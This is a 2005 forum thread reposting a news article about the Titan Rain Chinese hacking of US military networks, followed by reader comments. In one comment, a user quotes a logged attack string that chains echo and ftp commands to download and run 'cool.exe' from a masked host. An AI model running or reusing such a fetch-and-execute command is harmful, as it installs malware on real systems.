Free Republic
Browse · Search
News/Activism
Topics · Post Article

Skip to comments.

Chinese hackers breach US military defences: Uncle Sam hacks back in counter attack...
Silicon.com ^ | November 24, 2005 | Tom Espiner

Posted on 11/24/2005 12:30:04 PM PST by billorites

Security experts have revealed tantalising details about a group of Chinese hackers who are suspected of launching intelligence gathering attacks against the US government.

The hackers, who are believed to be based in the Chinese province of Guangdong, are thought to have stolen US military secrets, including aviation specifications and flight-planning software.

The US government has coined the term 'Titan Rain' to describe the hackers.

Alan Paller, director of the SANS Institute, said: "From the Redstone Arsenal, home to the Army Aviation and Missile Command, the attackers grabbed specs for the aviation mission-planning system for Army helicopters, as well as Falconview 3.2, the flight-planning software used by the Army and Air Force."

The team is thought to consist of 20 hackers. Paller claimed the Chinese government was the most likely recipient of the information they intercepted.

He told an event at the Department of Trade and Industry on Tuesday: "Of course it's the government. Governments will pay anything for control of other governments' computers. All governments will pay anything. It's so much better than tapping a phone."

Titan Rain first came to public attention this summer, when the Washington Post reported that websites in China were being used to target computer networks in the Defense Department and other US agencies.

Time later reported that Titan Rain had been counter-hacked by a US security expert called Shawn Carpenter.

The attacks, which are ongoing, were particularly effective on the night of 1 November, 2004, said Paller, who outlined how the hackers first scanned then broke into US government computers.

At 22:23(PST) the Titan Rain hackers exploited vulnerabilities at the US Army Information Systems Engineering Command at Fort Huachuca, Arizona. A few hours later, at 01:19(PST), they exploited the same hole in computers at the Defense Information Systems Agency in Arlington, Virginia.

By 03:25(PST) they had hit the Naval Ocean Systems Center, a Defense Department installation in San Diego, California. Then at 04:46(PST) they struck again - this time at the United States Army Space and Strategic Defense installation in Huntsville, Alabama.

The UK is also under intelligence-gathering cyber attack from the far east, according to the National Infrastructure Security Co-ordination Centre (NISCC). The government body cannot name the countries concerned as this may "ruin diplomatic efforts to halt the attacks", NISCC director Roger Cummings said on Tuesday.


TOPICS: News/Current Events
KEYWORDS:
Navigation: use the links below to view more comments.
first 1-2021-4041-6061-66 next last

1 posted on 11/24/2005 12:30:05 PM PST by billorites
[ Post Reply | Private Reply | View Replies]

To: billorites

Why are military computers with Top Secret material even connected to the Internet?


2 posted on 11/24/2005 12:31:44 PM PST by Rebelbase (Food stamps, section-8, State paid Child support, etc. pay more than the min. wage.)
[ Post Reply | Private Reply | To 1 | View Replies]

To: billorites
Why is Bill CLinton even consuming O2 from within United States soil??

Look what he got us into...

3 posted on 11/24/2005 12:32:56 PM PST by ExcursionGuy84 ("Jesus, Your Love takes my breath away.")
[ Post Reply | Private Reply | To 1 | View Replies]

To: Rebelbase

And why do we treat China like our best pal all the time?


4 posted on 11/24/2005 12:33:10 PM PST by cripplecreek (Never a minigun handy when you need one.)
[ Post Reply | Private Reply | To 2 | View Replies]

To: billorites

This looks like war.


5 posted on 11/24/2005 12:34:22 PM PST by brivette
[ Post Reply | Private Reply | To 1 | View Replies]

To: Rebelbase

Excellent question.


6 posted on 11/24/2005 12:34:26 PM PST by mtbopfuyn (Legality does not dictate morality... Lavin)
[ Post Reply | Private Reply | To 2 | View Replies]

To: billorites
American Veteran Shawn Carpenter who tracked down and counter-hacked a Chinese cyberespionage ring called "Titan Rain"


http://blogs.zdnet.com/Ou/?p=95

7 posted on 11/24/2005 12:37:42 PM PST by badpacifist (Schadenfreude)
[ Post Reply | Private Reply | To 1 | View Replies]

To: Rebelbase
Why are military computers with Top Secret material even connected to the Internet?

Maybe because the internet grew out of DARPA Net. What now is a neato place with commerce and forums, started as a government network. Who would have thought it? Mosaic was a cool browser.

8 posted on 11/24/2005 12:46:45 PM PST by ARealMothersSonForever (Proud to be named as a member of the Radical Right Wing. Vast Right Wing got old.)
[ Post Reply | Private Reply | To 2 | View Replies]

To: Rebelbase

At my company we were getting constant attacks from computers inside Chinese governmental agencies - I suppose we have lots of sensitive data that they would be interested in. Anyways, it got so annoying that eventually we just blocked all requests from that part of the world.

Its pretty scary. If you watch the ports of your computers you will find that there is steady stream of attacks. I find this to be the case even though I just use dial-up. There are people out there just scanning random computers looking for security vunerabilities. Many of these attempts seems to come from China/Hong Kong.

This is an example of the sort of attacks I get all the time:

portName[BackOrificeLogin]
Socket[addr=/###.###.###.##,port=3717,localport=31337]
data[echo open ###.###.###.## 10051>>o&echo h>>o&echo h>>o&echo get cool.exe>>o&echo bye>>o&ftp -n -s:o&cool.exe&del o&exit]


9 posted on 11/24/2005 12:47:58 PM PST by Avenger
[ Post Reply | Private Reply | To 2 | View Replies]

To: Rebelbase

What if the good guys wanted them to steal it - Kinda like stealing the Trojan Horse rather than receiving it as a gift?


10 posted on 11/24/2005 12:48:18 PM PST by SolutionsOnly
[ Post Reply | Private Reply | To 2 | View Replies]

To: billorites
Time later reported that Titan Rain had been counter-hacked by a US security expert called Shawn Carpenter.

You really have to wonder whose side the media is on! Well, actually no I don't. It's clear they're not on our side.

11 posted on 11/24/2005 12:50:38 PM PST by SolutionsOnly
[ Post Reply | Private Reply | To 1 | View Replies]

To: ExcursionGuy84

Why is Bill CLinton even consuming O2 from within United States soil??
Look what he got us into...""

I know Clinton is not innocent on this topic, but I thought Gore was the driving force behind releasing internet wordwide and also the GPS technology.


12 posted on 11/24/2005 12:51:35 PM PST by ridesthemiles (ridesthemiles)
[ Post Reply | Private Reply | To 3 | View Replies]

To: SolutionsOnly

Mailissa was specifically written as a "gift that would exercise networks". It was de-contained as a result of improper security procedures. The average user has no clue about how many little "presents" are intentionally left exposed.


13 posted on 11/24/2005 12:52:46 PM PST by ARealMothersSonForever (Proud to be named as a member of the Radical Right Wing. Vast Right Wing got old.)
[ Post Reply | Private Reply | To 10 | View Replies]

To: ARealMothersSonForever

Agreed. We're not as naive as many of these stories would imply.


14 posted on 11/24/2005 12:55:28 PM PST by SolutionsOnly
[ Post Reply | Private Reply | To 13 | View Replies]

To: brivette
>>>"This looks like war"<<<

BRING IT ON!

We have a bunch of geeks that would just love this kind of challenge, and many more wannabes queuing up.

TT
15 posted on 11/24/2005 1:02:58 PM PST by TexasTransplant (NEMO ME IMPUNE LACESSET)
[ Post Reply | Private Reply | To 5 | View Replies]

To: SolutionsOnly
We're not as naive as many of these stories would imply.

Not naive? How about stupid, then?

"What's shocking is that the FBI who unofficially worked with Carpenter ended up investigating Carpenter rather than the Titan Rain and dumped all of Carpenter's work."
16 posted on 11/24/2005 1:03:47 PM PST by gcruse (http://gcruse.typepad.com)
[ Post Reply | Private Reply | To 14 | View Replies]

To: SolutionsOnly
Falconview 3.2, the flight-planning software used by the Army and Air Force

This is hilarious. The UN is gonna freakin flip out when Falconview 3.2 cripples every Chicom network, and traces it's very existence across every network that touches it. Rich!

17 posted on 11/24/2005 1:07:11 PM PST by ARealMothersSonForever (Proud to be named as a member of the Radical Right Wing. Vast Right Wing got old.)
[ Post Reply | Private Reply | To 14 | View Replies]

To: gcruse
Not naive? How about stupid, then?

Do you actually believe we get the FULL story on matters like these? Unless your on the inside, you don't have clue as to what really is going on.

18 posted on 11/24/2005 1:14:05 PM PST by SolutionsOnly
[ Post Reply | Private Reply | To 16 | View Replies]

To: Avenger

I am a novice on the computer compared to all of you gentlemen and ladies so, if you would, please tell me, how do you "watch the ports of your computer". Thanks!


19 posted on 11/24/2005 1:15:03 PM PST by stolat (stolat)
[ Post Reply | Private Reply | To 9 | View Replies]

To: stolat

Go to Holymoly Homepage


20 posted on 11/24/2005 1:18:52 PM PST by ChefKeith ( If Diplomacy worked, then we would be sitting here talking...)
[ Post Reply | Private Reply | To 19 | View Replies]


Navigation: use the links below to view more comments.
first 1-2021-4041-6061-66 next last

Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.

Free Republic
Browse · Search
News/Activism
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson